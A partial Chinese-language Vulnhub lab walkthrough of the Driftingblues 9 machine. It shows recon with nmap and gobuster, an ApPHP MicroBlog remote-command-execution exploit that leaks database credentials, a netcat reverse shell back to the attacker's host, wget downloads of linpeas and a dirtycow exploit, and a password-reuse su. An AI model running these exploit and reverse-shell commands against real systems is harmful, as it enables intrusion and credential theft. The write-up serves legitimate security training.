Vulnhub之Driftingblues 9靶机解题过程(部分)
Driftingblues 9
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:87:54:c9 1 60 PCS Systemtechnik GmbH
192.168.56.197 08:00:27:66:4f:47 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的Netdiscover工具识别目标主机的IP地址为192.168.56.197
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.197 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 08:48 EST
Nmap scan report for localhost (192.168.56.197)
Host is up (0.000094s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-generator: ApPHP MicroBlog vCURRENT_VERSION
|_http-title: ApPHP MicroBlog
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39167/udp6 status
| 100024 1 45333/tcp6 status
| 100024 1 46215/tcp status
|_ 100024 1 52182/udp status
46215/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:66:4F:47 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
NMAP扫描结果除了2个RPC端口以外,有80端口开放,运行HTTP
Get Access
访问80端口,返回页面有admin登录入口,其中在表单中对user name以及password 有长度限制。
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ curl http://192.168.56.197/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 192.168.56.197 Port 80</address>
</body></html>
──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ gobuster dir --url http://192.168.56.197 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.197
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/20 08:56:08 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.197/images/]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.197/docs/]
/page (Status: 301) [Size: 315] [--> http://192.168.56.197/page/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.197/admin/]
/license (Status: 301) [Size: 318] [--> http://192.168.56.197/license/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.197/js/]
/include (Status: 301) [Size: 318] [--> http://192.168.56.197/include/]
/backup (Status: 301) [Size: 317] [--> http://192.168.56.197/backup/]
/styles (Status: 301) [Size: 317] [--> http://192.168.56.197/styles/]
/wysiwyg (Status: 301) [Size: 318] [--> http://192.168.56.197/wysiwyg/]
/server-status (Status: 403) [Size: 279]
/mails (Status: 301) [Size: 316] [--> http://192.168.56.197/mails/]
Progress: 220171 / 220561 (99.82%)===============================================================
2022/11/20 08:56:39 Finished
===============================================================
其中/mails目录,里面有一个文本文件,下载到Kali 本地
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ curl http://192.168.56.197/mails/password_forgotten.txt
Hello _USER_NAME_!<br> <br>
You or someone else asked for your login info on our site, _WEB_SITE_
Your Login Info:
------------------------<br/>
Username: _USER_NAME_
Password: _USER_PASSWORD_
------------------<br/>
Best regards,
_WEB_SITE_
这会不会是/admin登录的认证信息?试一下!
但是不对,看来没这么简单!
但是从页面源代码中的注释已经告知我们CMS的版本:
<!-- This script was generated by ApPHP MicroBlog v.1.0.1 (http://www.apphp.com/php-microblog/) -->
查一下该CMS有无漏洞
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ searchsploit ApPHP MicroBlog
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution | php/webapps/33070.py
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) | php/webapps/40506.html
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting | php/webapps/40505.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
发现有远程执行漏洞,将其拷贝到工作目录,
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ searchsploit -m php/webapps/33070.py
Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/33070
Path: /usr/share/exploitdb/exploits/php/webapps/33070.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Driftingblue9/33070.py
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
33070.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ mv 33070.py exploit.py
看了一下Python代码,需要用python2执行
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ python2 exploit.py http://192.168.56.197/index.php
-= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-
original exploit by Jiko : http://www.exploit-db.com/exploits/33030/
[*] Testing for vulnerability...
[+] Website is vulnerable
[*] Fecthing phpinfo
PHP Version 5.6.40-0+deb8u12
System Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686
Loaded Configuration File /etc/php5/apache2/php.ini
Apache Version Apache/2.4.10 (Debian)
User/Group www-data(33)/33
Server Root /etc/apache2
DOCUMENT_ROOT /var/www/html
PHP Version 5.6.40-0+deb8u12
allow_url_fopen On On
allow_url_include Off Off
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
open_basedir no value no value
System V Message based IPC Wez Furlong
System V Semaphores Tom May
System V Shared Memory Christian Cartus
[*] Fetching include/base.inc.php
<?php
// DATABASE CONNECTION INFORMATION
define('DATABASE_HOST', 'localhost'); // Database host
define('DATABASE_NAME', 'microblog'); // Name of the database to be used
define('DATABASE_USERNAME', 'clapton'); // User name for access to database
define('DATABASE_PASSWORD', 'yaraklitepe'); // Password for access to database
define('DB_ENCRYPT_KEY', 'p52plaiqb8'); // Database encryption key
define('DB_PREFIX', 'mb101_'); // Unique prefix of all table names in the database
?>
[*] Testing remote execution
[+] Remote exec is working with system() :)
Submit your commands, type exit to quit
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
>
发现可以成功执行该代码,需要Spawn出新的shell
> which nc
/bin/nc
> nc -e /bin/bash 192.168.56.137 5555
在Kali Linux上成功得到返回的shell
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.197] 38900
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/var/www/html$
提权
将linpeas.sh脚本上传至目标主机的/tmp目录,修改选线,并执行该脚本:
www-data@debian:/home$ cd /tmp
cd /tmp
www-data@debian:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
converted 'http://192.168.56.137:8000/linpeas.sh' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/linpeas.sh' (UTF-8)
--2022-11-20 09:11:18-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[=====================>] 808.42K --.-KB/s in 0.004s
2022-11-20 09:11:18 (220 MB/s) - 'linpeas.sh' saved [827827/827827]
www-data@debian:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@debian:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 3.16.0-4-586 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 Debian 3.16.51-2 (2017-12-03)
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: debian
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.16.0-4-586 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 Debian 3.16.51-2 (2017-12-03)
Distributor ID: Debian
Description: Debian GNU/Linux 8.11 (jessie)
Release: 8.11
Codename: jessie
╔══════════╣ Sudo version
sudo Not Found
╔══════════╣ CVEs Check
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
╔══════════╣ Date & uptime
Sun Nov 20 09:11:29 EST 2022
09:11:29 up 27 min, 0 users, load average: 0.00, 0.93, 1.04
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda5
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=ff9aca6e-808b-49a0-86f4-99c90e7b249f / ext4 errors=remount-ro 0 1
UUID=262cdee1-830f-46a8-b97b-459094fc0390 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: [ debian=7|8 ],RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
从linpeas.sh脚本输出结果看,我们可以利用dirtycow 2漏洞利用脚本
将C利用代码下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
40839.c exploit.py linpeas.sh nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$
然后利用Python的web服务,将其上传至目标主机。
www-data@debian:/tmp$ wget http://192.168.56.137:8000/40839.c
wget http://192.168.56.137:8000/40839.c
converted 'http://192.168.56.137:8000/40839.c' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/40839.c' (UTF-8)
--2022-11-20 09:19:29-- http://192.168.56.137:8000/40839.c
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/x-csrc]
Saving to: '40839.c'
40839.c 100%[=====================>] 4.89K --.-KB/s in 0s
2022-11-20 09:19:29 (208 MB/s) - '40839.c' saved [5006/5006]
www-data@debian:/tmp$ ls
ls
40839.c linpeas.sh
www-data@debian:/tmp$
根据代码本身给出的编译的方法进行编译,但是目标主机没有gcc工具
www-data@debian:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
bash: gcc: command not found
www-data@debian:/tmp$ which gcc
which gcc
www-data@debian:/tmp$
试一试在Kali本地编译完成以后再上传到目标主机执行
wget http://192.168.56.137:8000/dirty
converted 'http://192.168.56.137:8000/dirty' (ANSI_X3.4-1968) -> 'http://192.168.56.137:8000/dirty' (UTF-8)
--2022-11-20 09:22:26-- http://192.168.56.137:8000/dirty
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17512 (17K) [application/octet-stream]
Saving to: 'dirty'
dirty 100%[=====================>] 17.10K --.-KB/s in 0s
2022-11-20 09:22:26 (594 MB/s) - 'dirty' saved [17512/17512]
www-data@debian:/tmp$ chmod +x dirty
chmod +x dirty
www-data@debian:/tmp$ ./dirty
./dirty
bash: ./dirty: cannot execute binary file: Exec format error
www-data@debian:/tmp$
执行失败!这条路径只能放弃!
仔细查看其他文件,发现了:
www-data@debian:/var/www/html/include$ cat base.inc.php
cat base.inc.php
<?php
// DATABASE CONNECTION INFORMATION
define('DATABASE_HOST', 'localhost'); // Database host
define('DATABASE_NAME', 'microblog'); // Name of the database to be used
define('DATABASE_USERNAME', 'clapton'); // User name for access to database
define('DATABASE_PASSWORD', 'yaraklitepe'); // Password for access to database
define('DB_ENCRYPT_KEY', 'p52plaiqb8'); // Database encryption key
define('DB_PREFIX', 'mb101_'); // Unique prefix of all table names in the database
?>www-data@debian:/var/www/html/include$
即用户clapton的密码,切换到这个用户
www-data@debian:/var/www/html/include$ su - clapton
su - clapton
Password: yaraklitepe
clapton@debian:~$ ls -alh
ls -alh
total 24K
dr-x------ 2 clapton clapton 4.0K May 9 2021 .
drwxr-xr-x 3 root root 4.0K May 9 2021 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 input
-rwxr-xr-x 1 root root 201 May 9 2021 note.txt
-rw-r--r-- 1 clapton clapton 32 May 9 2021 user.txt
clapton@debian:~$ cat user.txt
cat user.txt
F569AA95FAFF65E7A290AB9ED031E04Fclapton@debian:~$ cat note.txt
cat note.txt
buffer overflow is the way. ( ° ʖ °)
if you're new on 32bit bof then check these:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
clapton@debian:~$
这里提示需要用到缓冲区溢出漏洞,将input文件下载Kali Linux本地
clapton@debian:~$ ls
ls
input note.txt user.txt
clapton@debian:~$ which python
which python
/usr/bin/python
clapton@debian:~$ which python3
which python3
clapton@debian:~$ python -m SimpleHttpServer
python -m SimpleHttpServer
/usr/bin/python: No module named SimpleHttpServer
clapton@debian:~$ python -m SimpleHTTPServer
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ wget http://192.168.56.197:8000/input
--2022-11-20 09:37:26-- http://192.168.56.197:8000/input
Connecting to 192.168.56.197:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5150 (5.0K) [application/octet-stream]
Saving to: ‘input’
input 100%[==================================================================================================================================>] 5.03K --.-KB/s in 0s
2022-11-20 09:37:26 (366 MB/s) - ‘input’ saved [5150/5150]
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue9]
└─$ ls
40839.c dirty exploit.py input linpeas.sh nmap_full_scan
缓冲区溢出漏洞难度对我来说太大,暂时放弃!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号